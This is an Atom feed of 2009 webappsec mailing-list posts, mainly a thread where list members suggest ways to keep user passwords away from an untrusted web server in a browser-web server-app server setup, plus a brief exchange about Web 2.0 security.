&lt;br&gt;&amp;gt;&amp;gt; We have a requirement where password should not be available to the
&lt;br&gt;&amp;gt;&amp;gt; WebServer (even in hashed format).
&lt;br&gt;&amp;gt;&amp;gt;
&lt;br&gt;&amp;gt;&amp;gt; Only solution that I can think of is having an Applet performing PKI
&lt;br&gt;&amp;gt;&amp;gt; encryption on the password before submitting the form.
&lt;br&gt;&amp;gt;&amp;gt;
&lt;br&gt;&amp;gt;&amp;gt; Please suggest if there are any better alternatives.
&lt;br&gt;&amp;gt;&amp;gt;
&lt;br&gt;&amp;gt;&amp;gt; Thanks,
&lt;br&gt;&amp;gt;&amp;gt;
&lt;br&gt;&amp;gt;&amp;gt; Chintan
&lt;br&gt;&amp;gt;&amp;gt;
&lt;br&gt;&amp;gt;&amp;gt;
&lt;br&gt;&amp;gt;
&lt;br&gt;&amp;gt;
&lt;br&gt;&amp;gt;
&lt;/div&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/Securing-password-between-webserver---appserver.-tp25325566p25376669.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-25371487</id>
	<title>Re: Web 2.0 support group</title>
	<published>2009-09-09T06:10:56Z</published>
	<updated>2009-09-09T06:10:56Z</updated>
	<author>
		<name>Steve Pinkham</name>
	</author>
	<content type="html">Steven M. Christey wrote:
&lt;div class='shrinkable-quote'&gt;&lt;br&gt;&amp;gt; So I've been an observer of the &amp;quot;Web 2.0 is a security nightmare&amp;quot; camp
&lt;br&gt;&amp;gt; with the occasional head nods and detached agreement, being enough of a
&lt;br&gt;&amp;gt; generalist that I didn't have anything to add to the alarms raised by the
&lt;br&gt;&amp;gt; specialists. &amp;nbsp;Where is the support group for those who have recently
&lt;br&gt;&amp;gt; realized just how desperate the situation is?
&lt;br&gt;&amp;gt; 
&lt;br&gt;&amp;gt; I'm not being entirely facetious. &amp;nbsp;Is there any hope at all?
&lt;br&gt;&amp;gt; 
&lt;br&gt;&amp;gt; - Steve
&lt;br&gt;&amp;gt; 
&lt;br&gt;&amp;gt; 
&lt;/div&gt;&lt;br&gt;1. No, but there is no hope for generalized security apart from &amp;quot;Web 
&lt;br&gt;2.0&amp;quot; either. &amp;nbsp;There is only risk reduction.
&lt;br&gt;&lt;br&gt;2. Stop complaining about Web 2.0. &amp;nbsp;Really. &amp;nbsp;It doesn't exist. &amp;nbsp;There 
&lt;br&gt;are security problems specific to JSON, AJAX, REST, SOAP, FLEX, social 
&lt;br&gt;networking, P2P, etc. &amp;nbsp;If you want to actually discuss the risk, name 
&lt;br&gt;the risk you're interested in. &amp;nbsp;Web 2.0 doesn't mean anything we can 
&lt;br&gt;discuss like rational people. &amp;nbsp;Same goes for &amp;quot;the Cloud&amp;quot;.
&lt;br&gt;&lt;br&gt;Steve
&lt;br&gt;-- 
&lt;br&gt;&amp;nbsp; | Steven E. Pinkham &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; | Security Researcher, Maven Security &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; | &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=25371487&amp;i=0&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;steve.pinkham@...&lt;/a&gt; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; | GPG public key ID CD31CAFB &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&lt;br&gt;&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/Web-2.0-support-group-tp25359772p25371487.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-25359772</id>
	<title>Web 2.0 support group</title>
	<published>2009-09-08T22:21:20Z</published>
	<updated>2009-09-08T22:21:20Z</updated>
	<author>
		<name>Steven M. Christey-2</name>
	</author>
	<content type="html">&lt;br&gt;So I've been an observer of the &amp;quot;Web 2.0 is a security nightmare&amp;quot; camp
&lt;br&gt;with the occasional head nods and detached agreement, being enough of a
&lt;br&gt;generalist that I didn't have anything to add to the alarms raised by the
&lt;br&gt;specialists. &amp;nbsp;Where is the support group for those who have recently
&lt;br&gt;realized just how desperate the situation is?
&lt;br&gt;&lt;br&gt;I'm not being entirely facetious. &amp;nbsp;Is there any hope at all?
&lt;br&gt;&lt;br&gt;- Steve
&lt;br&gt;&lt;br&gt;&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/Web-2.0-support-group-tp25359772p25359772.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-25359643</id>
	<title>Re: Securing password between webserver &amp; appserver.</title>
	<published>2009-09-08T20:34:09Z</published>
	<updated>2009-09-08T20:34:09Z</updated>
	<author>
		<name>bigbert007</name>
	</author>
	<content type="html">Till - great recommendation, I'll expand on it.
&lt;br&gt;&lt;br&gt;Depending on the back end app server, there is usually a mechanism in 
&lt;br&gt;place for creating a trust between the web server and appserver and then 
&lt;br&gt;encrypting that connection with SSL. &amp;nbsp;When credentials are entered the 
&lt;br&gt;entire pipe is encrypted from the client &amp;gt; webserver &amp;gt; app server based 
&lt;br&gt;upon that trust relationship and SSL- encrypted connection
&lt;br&gt;&lt;br&gt;Websphere has this option available as does Tomcat. &amp;nbsp;I suspect that 
&lt;br&gt;Coldfusion and other app servers have something similar.
&lt;br&gt;&lt;br&gt;Good luck.
&lt;br&gt;&lt;br&gt;Don
&lt;br&gt;&lt;br&gt;Till Elsner wrote:
&lt;div class='shrinkable-quote'&gt;&lt;br&gt;&amp;gt; What about securing (i.e. encrypting) the connection between web 
&lt;br&gt;&amp;gt; server and app server itself, like connecting to the app server from 
&lt;br&gt;&amp;gt; the web server via a SSH-forwarded local port? You could keep the 
&lt;br&gt;&amp;gt; original authentication method and have the entire communication 
&lt;br&gt;&amp;gt; encrypted anyway.
&lt;br&gt;&amp;gt;
&lt;br&gt;&amp;gt; Greetings
&lt;br&gt;&amp;gt; Till
&lt;br&gt;&amp;gt;
&lt;br&gt;&amp;gt; Am 07.09.2009 um 08:04 schrieb Chintan Oza:
&lt;br&gt;&amp;gt;
&lt;br&gt;&amp;gt;&amp;gt; Dear All,
&lt;br&gt;&amp;gt;&amp;gt;
&lt;br&gt;&amp;gt;&amp;gt; We have a web application which perform user authentication on
&lt;br&gt;&amp;gt;&amp;gt; id+password basis.
&lt;br&gt;&amp;gt;&amp;gt;
&lt;br&gt;&amp;gt;&amp;gt; The architecture is like this.
&lt;br&gt;&amp;gt;&amp;gt; Browser&amp;lt;-HTTPS-&amp;gt;WebServer&amp;lt;--&amp;gt;AppServer
&lt;br&gt;&amp;gt;&amp;gt;
&lt;br&gt;&amp;gt;&amp;gt; We have a requirement where password should not be available to the
&lt;br&gt;&amp;gt;&amp;gt; WebServer (even in hashed format).
&lt;br&gt;&amp;gt;&amp;gt;
&lt;br&gt;&amp;gt;&amp;gt; Only solution that I can think of is having an Applet performing PKI
&lt;br&gt;&amp;gt;&amp;gt; encryption on the password before submitting the form.
&lt;br&gt;&amp;gt;&amp;gt;
&lt;br&gt;&amp;gt;&amp;gt; Please suggest if there are any better alternatives.
&lt;br&gt;&amp;gt;&amp;gt;
&lt;br&gt;&amp;gt;&amp;gt; Thanks,
&lt;br&gt;&amp;gt;&amp;gt;
&lt;br&gt;&amp;gt;&amp;gt; Chintan
&lt;br&gt;&amp;gt;&amp;gt;
&lt;br&gt;&amp;gt;&amp;gt;
&lt;br&gt;&amp;gt;
&lt;br&gt;&amp;gt;
&lt;br&gt;&amp;gt;
&lt;/div&gt;&lt;br&gt;&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/Securing-password-between-webserver---appserver.-tp25325566p25359643.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-25357509</id>
	<title>Re: Securing password between webserver &amp; appserver.</title>
	<published>2009-09-08T16:58:18Z</published>
	<updated>2009-09-08T16:58:18Z</updated>
	<author>
		<name>Till Elsner</name>
	</author>
	<content type="html">What about securing (i.e. encrypting) the connection between web &amp;nbsp;
&lt;br&gt;server and app server itself, like connecting to the app server from &amp;nbsp;
&lt;br&gt;the web server via a SSH-forwarded local port? You could keep the &amp;nbsp;
&lt;br&gt;original authentication method and have the entire communication &amp;nbsp;
&lt;br&gt;encrypted anyway.
&lt;br&gt;&lt;br&gt;Greetings
&lt;br&gt;Till
&lt;br&gt;&lt;br&gt;Am 07.09.2009 um 08:04 schrieb Chintan Oza:
&lt;br&gt;&lt;div class='shrinkable-quote'&gt;&lt;br&gt;&amp;gt; Dear All,
&lt;br&gt;&amp;gt;
&lt;br&gt;&amp;gt; We have a web application which perform user authentication on
&lt;br&gt;&amp;gt; id+password basis.
&lt;br&gt;&amp;gt;
&lt;br&gt;&amp;gt; The architecture is like this.
&lt;br&gt;&amp;gt; Browser&amp;lt;-HTTPS-&amp;gt;WebServer&amp;lt;--&amp;gt;AppServer
&lt;br&gt;&amp;gt;
&lt;br&gt;&amp;gt; We have a requirement where password should not be available to the
&lt;br&gt;&amp;gt; WebServer (even in hashed format).
&lt;br&gt;&amp;gt;
&lt;br&gt;&amp;gt; Only solution that I can think of is having an Applet performing PKI
&lt;br&gt;&amp;gt; encryption on the password before submitting the form.
&lt;br&gt;&amp;gt;
&lt;br&gt;&amp;gt; Please suggest if there are any better alternatives.
&lt;br&gt;&amp;gt;
&lt;br&gt;&amp;gt; Thanks,
&lt;br&gt;&amp;gt;
&lt;br&gt;&amp;gt; Chintan
&lt;br&gt;&amp;gt;
&lt;br&gt;&amp;gt;
&lt;/div&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/Securing-password-between-webserver---appserver.-tp25325566p25357509.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-25355935</id>
	<title>Re: Securing password between webserver &amp; appserver.</title>
	<published>2009-09-08T09:15:09Z</published>
	<updated>2009-09-08T09:15:09Z</updated>
	<author>
		<name>arvind doraiswamy</name>
	</author>
	<content type="html">You're right, the client side CC is just another alternative if you're
&lt;br&gt;worried about passwords being in clear text. If you have Client side
&lt;br&gt;certs you can probably even do away with authentication as only
&lt;br&gt;specific users will have the cert, though most places have the cert
&lt;br&gt;and the login form as well to protect against the cert being stolen.
&lt;br&gt;&lt;br&gt;The SSL , yes will end at the Web server..but hey that is what it is
&lt;br&gt;supposed to do. The deal though is - If you have a salted hash
&lt;br&gt;mechanism with the salt controlled at the server, the password will
&lt;br&gt;still be encrypted ...NOT by the SSL but because of the salt and the
&lt;br&gt;MD5/SHA1 you are using on the client side to encrypt it.
&lt;br&gt;&lt;br&gt;The Client side code in this case won't be bypasssed. Well, I mean you
&lt;br&gt;can of course intercept and remove the Javascript but the server won't
&lt;br&gt;accept a request without a valid salted password hash..so you should
&lt;br&gt;be fine. A lot of apps I've seen do this.
&lt;br&gt;&lt;br&gt;Lastly if you're concerned with the traffic between the WebServer and
&lt;br&gt;the DB, you'll want to ensure that all your queries are also sent over
&lt;br&gt;SSL(You'll probably need to enable this on the DB first). Incase your
&lt;br&gt;app server(Tomcat/Weblogic etc) if at all you have one is on a
&lt;br&gt;separate server , you'll need to look at encrypting content between:
&lt;br&gt;&lt;br&gt;a)Client and the WS
&lt;br&gt;b WS and the AS
&lt;br&gt;c)AS and the DB
&lt;br&gt;&lt;br&gt;Hope that clarifies things a little more.
&lt;br&gt;&lt;br&gt;Cheers
&lt;br&gt;Arvind
&lt;br&gt;&lt;br&gt;On Tue, Sep 8, 2009 at 10:50 AM, Chintan Oza&amp;lt;&lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=25355935&amp;i=0&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;chintan.oza@...&lt;/a&gt;&amp;gt; wrote:
&lt;div class='shrinkable-quote'&gt;&lt;br&gt;&amp;gt; Hi Arvind,
&lt;br&gt;&amp;gt;
&lt;br&gt;&amp;gt; There are 1 set of users for which password verification is done by
&lt;br&gt;&amp;gt; over server where as in case of other group of users the password
&lt;br&gt;&amp;gt; verification will be done by a third party system which expects
&lt;br&gt;&amp;gt; password in the plain format.
&lt;br&gt;&amp;gt;
&lt;br&gt;&amp;gt; Correct me if I am wrong but usage of client certificate doesnt help
&lt;br&gt;&amp;gt; protect communication between web server and app server as its job
&lt;br&gt;&amp;gt; ends at web server which handles ssl.
&lt;br&gt;&amp;gt;
&lt;br&gt;&amp;gt; Thanks,
&lt;br&gt;&amp;gt;
&lt;br&gt;&amp;gt; Chintan
&lt;/div&gt;&lt;br&gt;&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/Securing-password-between-webserver---appserver.-tp25325566p25355935.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-25355876</id>
	<title>RE: Securing password between webserver &amp; appserver.</title>
	<published>2009-09-08T06:14:00Z</published>
	<updated>2009-09-08T06:14:00Z</updated>
	<author>
		<name>Martin O'Neal</name>
	</author>
	<content type="html">&lt;br&gt;&amp;gt; Or why not bypass the webserver altogether 
&lt;br&gt;&amp;gt; for auth if itisnt trusted. Send credentials 
&lt;br&gt;&amp;gt; directly to the app server, that is assuming 
&lt;br&gt;&amp;gt; the app server is publicly accesible.
&lt;br&gt;&lt;br&gt;Yup, would work. However, it would be a novel situation in which the
&lt;br&gt;credentials were sensitive, but the data was not.
&lt;br&gt;&lt;br&gt;I would personally be trying to resolve the untrusted web server
&lt;br&gt;situation...
&lt;br&gt;&lt;br&gt;Martin...
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; 
&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/Securing-password-between-webserver---appserver.-tp25325566p25355876.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-25340575</id>
	<title>RE: Securing password between webserver &amp; appserver.</title>
	<published>2009-09-07T23:16:29Z</published>
	<updated>2009-09-07T23:16:29Z</updated>
	<author>
		<name>Martin O'Neal</name>
	</author>
	<content type="html">&amp;nbsp;
&lt;br&gt;&amp;gt; You are right. &amp;nbsp;Without changing your 
&lt;br&gt;&amp;gt; architecture or requirements you would 
&lt;br&gt;&amp;gt; have to have the client encrypt the 
&lt;br&gt;&amp;gt; message before sending it through an 
&lt;br&gt;&amp;gt; untrusted web server.
&lt;br&gt;&lt;br&gt;Just stating the obvious here though; if the web server is genuinely
&lt;br&gt;untrusted, then logically none of this can be secured anyway.
&lt;br&gt;&lt;br&gt;An attacker at the web server is a classic MITM. All they need to do is
&lt;br&gt;remove the client side auth code as it passes on the way out to the
&lt;br&gt;client, and then they will always receive a clear-text password back
&lt;br&gt;from the client. POW!
&lt;br&gt;&lt;br&gt;If you don't trust the server, then a web delivery mechanism probably
&lt;br&gt;isn't the right architecture at all.
&lt;br&gt;&lt;br&gt;Martin...
&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/Securing-password-between-webserver---appserver.-tp25325566p25340575.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-25340195</id>
	<title>Re: Securing password between webserver &amp; appserver.</title>
	<published>2009-09-07T22:20:15Z</published>
	<updated>2009-09-07T22:20:15Z</updated>
	<author>
		<name>Chintan Oza</name>
	</author>
	<content type="html">Hi Arvind,
&lt;br&gt;&lt;br&gt;There are 1 set of users for which password verification is done by
&lt;br&gt;over server where as in case of other group of users the password
&lt;br&gt;verification will be done by a third party system which expects
&lt;br&gt;password in the plain format.
&lt;br&gt;&lt;br&gt;Correct me if I am wrong but usage of client certificate doesnt help
&lt;br&gt;protect communication between web server and app server as its job
&lt;br&gt;ends at web server which handles ssl.
&lt;br&gt;&lt;br&gt;Thanks,
&lt;br&gt;&lt;br&gt;Chintan
&lt;br&gt;&lt;br&gt;On Mon, Sep 7, 2009 at 9:59 PM, arvind
&lt;br&gt;doraiswamy&amp;lt;&lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=25340195&amp;i=0&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;arvind.doraiswamy@...&lt;/a&gt;&amp;gt; wrote:
&lt;div class='shrinkable-quote'&gt;&lt;br&gt;&amp;gt; Hey Chintan,
&lt;br&gt;&amp;gt; Yes client side certificates are possible but a big pain if you have a
&lt;br&gt;&amp;gt; large number of users to whom you have to distribute them too.
&lt;br&gt;&amp;gt;
&lt;br&gt;&amp;gt; However I'm curious, a properly implemented salted hash solution where
&lt;br&gt;&amp;gt; the salt is randomly generated and matched on the server each time the
&lt;br&gt;&amp;gt; client sends it will prevent a lot of attacks. Note - the server
&lt;br&gt;&amp;gt; decides the salt, not the client.
&lt;br&gt;&amp;gt;
&lt;br&gt;&amp;gt; So while I am not contesting your requirement and your reasons I think
&lt;br&gt;&amp;gt; that not much harm is done even if the webserver sees the
&lt;br&gt;&amp;gt; salted-hashed password. It can't be cracked , it can't be replayed so
&lt;br&gt;&amp;gt; what's the problem?
&lt;br&gt;&amp;gt;
&lt;br&gt;&amp;gt; Am I missing something?
&lt;br&gt;&amp;gt;
&lt;br&gt;&amp;gt; Cheers
&lt;br&gt;&amp;gt; Arvind
&lt;br&gt;&amp;gt;
&lt;br&gt;&amp;gt; On Mon, Sep 7, 2009 at 11:34 AM, Chintan Oza&amp;lt;&lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=25340195&amp;i=1&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;chintan.oza@...&lt;/a&gt;&amp;gt; wrote:
&lt;br&gt;&amp;gt;&amp;gt; Dear All,
&lt;br&gt;&amp;gt;&amp;gt;
&lt;br&gt;&amp;gt;&amp;gt; We have a web application which perform user authentication on
&lt;br&gt;&amp;gt;&amp;gt; id+password basis.
&lt;br&gt;&amp;gt;&amp;gt;
&lt;br&gt;&amp;gt;&amp;gt; The architecture is like this.
&lt;br&gt;&amp;gt;&amp;gt; Browser&amp;lt;-HTTPS-&amp;gt;WebServer&amp;lt;--&amp;gt;AppServer
&lt;br&gt;&amp;gt;&amp;gt;
&lt;br&gt;&amp;gt;&amp;gt; We have a requirement where password should not be available to the
&lt;br&gt;&amp;gt;&amp;gt; WebServer (even in hashed format).
&lt;br&gt;&amp;gt;&amp;gt;
&lt;br&gt;&amp;gt;&amp;gt; Only solution that I can think of is having an Applet performing PKI
&lt;br&gt;&amp;gt;&amp;gt; encryption on the password before submitting the form.
&lt;br&gt;&amp;gt;&amp;gt;
&lt;br&gt;&amp;gt;&amp;gt; Please suggest if there are any better alternatives.
&lt;br&gt;&amp;gt;&amp;gt;
&lt;br&gt;&amp;gt;&amp;gt; Thanks,
&lt;br&gt;&amp;gt;&amp;gt;
&lt;br&gt;&amp;gt;&amp;gt; Chintan
&lt;br&gt;&amp;gt;&amp;gt;
&lt;br&gt;&amp;gt;&amp;gt;
&lt;br&gt;&amp;gt;&amp;gt;
&lt;br&gt;&amp;gt;
&lt;/div&gt;&lt;br&gt;&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/Securing-password-between-webserver---appserver.-tp25325566p25340195.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-25339711</id>
	<title>RE: Securing password between webserver &amp; appserver.</title>
	<published>2009-09-07T20:48:41Z</published>
	<updated>2009-09-07T20:48:41Z</updated>
	<author>
		<name>Ken Schaefer</name>
	</author>
	<content type="html">Is this an internal application? Kerberos can be used to solve this problem for internal apps.
&lt;br&gt;&lt;br&gt;Alternatively, can you use client certificate based authentication?
&lt;br&gt;&lt;br&gt;Cheers
&lt;br&gt;Ken
&lt;br&gt;&lt;br&gt;-----Original Message-----
&lt;br&gt;From: &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=25339711&amp;i=0&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;listbounce@...&lt;/a&gt; [mailto:&lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=25339711&amp;i=1&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;listbounce@...&lt;/a&gt;] On Behalf Of Chintan Oza
&lt;br&gt;Sent: Monday, 7 September 2009 2:04 PM
&lt;br&gt;To: &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=25339711&amp;i=2&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;webappsec@...&lt;/a&gt;
&lt;br&gt;Subject: Securing password between webserver &amp; appserver.
&lt;br&gt;&lt;br&gt;Dear All,
&lt;br&gt;&lt;br&gt;We have a web application which perform user authentication on
&lt;br&gt;id+password basis.
&lt;br&gt;&lt;br&gt;The architecture is like this.
&lt;br&gt;Browser&amp;lt;-HTTPS-&amp;gt;WebServer&amp;lt;--&amp;gt;AppServer
&lt;br&gt;&lt;br&gt;We have a requirement where password should not be available to the WebServer (even in hashed format).
&lt;br&gt;&lt;br&gt;Only solution that I can think of is having an Applet performing PKI encryption on the password before submitting the form.
&lt;br&gt;&lt;br&gt;Please suggest if there are any better alternatives.
&lt;br&gt;&lt;br&gt;Thanks,
&lt;br&gt;&lt;br&gt;Chintan
&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/Securing-password-between-webserver---appserver.-tp25325566p25339711.html" />
</entry>

</feed>
